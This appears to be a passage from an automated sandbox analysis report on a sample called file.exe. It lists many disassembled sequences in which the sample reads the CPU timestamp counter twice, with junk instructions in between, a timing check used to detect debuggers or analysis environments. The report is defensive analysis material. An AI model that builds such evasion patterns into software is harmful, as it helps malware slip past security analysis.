Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD1F0D second address: DD1F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8CE4DC41A6h 0x0000000a js 00007F8CE4DC41A6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jnl 00007F8CE4DC41AEh 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD2318 second address: DD2322 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8CE470D04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD5717 second address: DD573A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F8CE4DC41ABh 0x0000000d pushad 0x0000000e jmp 00007F8CE4DC41ADh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDB030 second address: DDB034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDB339 second address: DDB343 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CE4DC41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDB911 second address: DDB91B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CE470D046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDB91B second address: DDB934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CE4DC41B4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDB934 second address: DDB94B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D051h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDB94B second address: DDB953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDB953 second address: DDB959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDC3F5 second address: DDC3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDC99F second address: DDC9AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE739B second address: DE73A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE73A7 second address: DE73B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE73B9 second address: DE73C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE64EA second address: DE6505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F8CE470D053h 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE6505 second address: DE6516 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8CE4DC41ACh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE6516 second address: DE6522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8CE470D046h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE6522 second address: DE6528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE6682 second address: DE668D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE668D second address: DE669C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F8CE4DC41A6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE6B36 second address: DE6B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D050h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE6B4A second address: DE6B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F8CE4DC41A6h 0x0000000f jng 00007F8CE4DC41A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE7102 second address: DE7125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D057h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F8CE470D046h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE7125 second address: DE7129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF07C6 second address: DF07D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D04Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEEC8D second address: DEEC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEEC98 second address: DEECB2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8CE470D052h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEECB2 second address: DEECB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEECB8 second address: DEECBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEECBC second address: DEECE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jmp 00007F8CE4DC41B4h 0x00000012 jnl 00007F8CE4DC41A6h 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEECE4 second address: DEECF3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8CE470D04Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEEFC1 second address: DEEFD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8CE4DC41A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEEFD3 second address: DEEFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 js 00007F8CE470D046h 0x0000000f jo 00007F8CE470D046h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEEFEF second address: DEF00E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8CE4DC41B9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEF00E second address: DEF01B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F8CE470D046h 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEF14B second address: DEF179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B1h 0x00000007 jmp 00007F8CE4DC41B1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F8CE4DC41ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEF3D3 second address: DEF3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D04Fh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEF3E9 second address: DEF3F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEF5A3 second address: DEF5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8CE470D046h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEF5AF second address: DEF5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEF5B3 second address: DEF5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8CE470D046h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jne 00007F8CE470D046h 0x00000013 jng 00007F8CE470D046h 0x00000019 pop edi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c jne 00007F8CE470D060h 0x00000022 push eax 0x00000023 jo 00007F8CE470D046h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF0625 second address: DF0629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF5A8D second address: DF5A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF5A91 second address: DF5AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF5D3B second address: DF5D5E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8CE470D05Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF5D5E second address: DF5D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF5D68 second address: DF5D74 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E00B78 second address: E00B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8CE4DC41A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E062A0 second address: E062A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E062A4 second address: E062A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E062A8 second address: E062B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F8CE470D046h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E062B7 second address: E062E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F8CE4DC41B5h 0x0000000c jns 00007F8CE4DC41AEh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E05CA9 second address: E05CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8CE470D046h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B793 second address: E0B7CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8CE4DC41B1h 0x00000008 pop esi 0x00000009 push edi 0x0000000a jnp 00007F8CE4DC41A6h 0x00000010 jns 00007F8CE4DC41A6h 0x00000016 pop edi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F8CE4DC41B0h 0x00000021 jmp 00007F8CE4DC41AAh 0x00000026 push edi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B7CD second address: E0B7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B7D3 second address: E0B7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0F16C second address: E0F17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8CE470D046h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0F17A second address: E0F18D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8CE4DC41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E17AE2 second address: E17AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E17AE6 second address: E17AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F8CE4DC41A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E17AF6 second address: E17B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F8CE470D04Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E17B18 second address: E17B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8CE4DC41A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E200DA second address: E200F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jo 00007F8CE470D04Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2025F second address: E20291 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8CE4DC41BDh 0x00000008 push edi 0x00000009 jmp 00007F8CE4DC41B0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E203FF second address: E20414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 jns 00007F8CE470D046h 0x0000000e jnl 00007F8CE470D046h 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E20881 second address: E20887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E20887 second address: E2088B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2088B second address: E208A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE4DC41AFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E209E9 second address: E20A02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D053h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E20A02 second address: E20A22 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8CE4DC41B4h 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F8CE4DC41A6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E20A22 second address: E20A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E20A26 second address: E20A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E20B97 second address: E20BCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D050h 0x00000007 jns 00007F8CE470D046h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8CE470D059h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E20BCC second address: E20BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E22F2A second address: E22F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E22F30 second address: E22F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E22F3B second address: E22F52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D050h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E22F52 second address: E22F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E22F58 second address: E22F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 ja 00007F8CE470D082h 0x0000000c jp 00007F8CE470D04Eh 0x00000012 jno 00007F8CE470D046h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8CE470D056h 0x00000021 jmp 00007F8CE470D04Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E22F96 second address: E22F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2D561 second address: E2D569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E315BF second address: E315C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E315C7 second address: E315D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8CE470D046h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E315D3 second address: E315D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E42A77 second address: E42A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007F8CE470D052h 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F8CE470D046h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E428AC second address: E428B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8CE4DC41A6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E428B8 second address: E428D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CE470D053h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44977 second address: E44996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8CE4DC41A6h 0x0000000a jmp 00007F8CE4DC41B4h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44996 second address: E449BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8CE470D054h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E449BB second address: E449BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E446B9 second address: E446C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F8CE470D046h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E55702 second address: E5570C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5570C second address: E55714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E55714 second address: E55718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E55718 second address: E5572E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D04Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5572E second address: E55732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
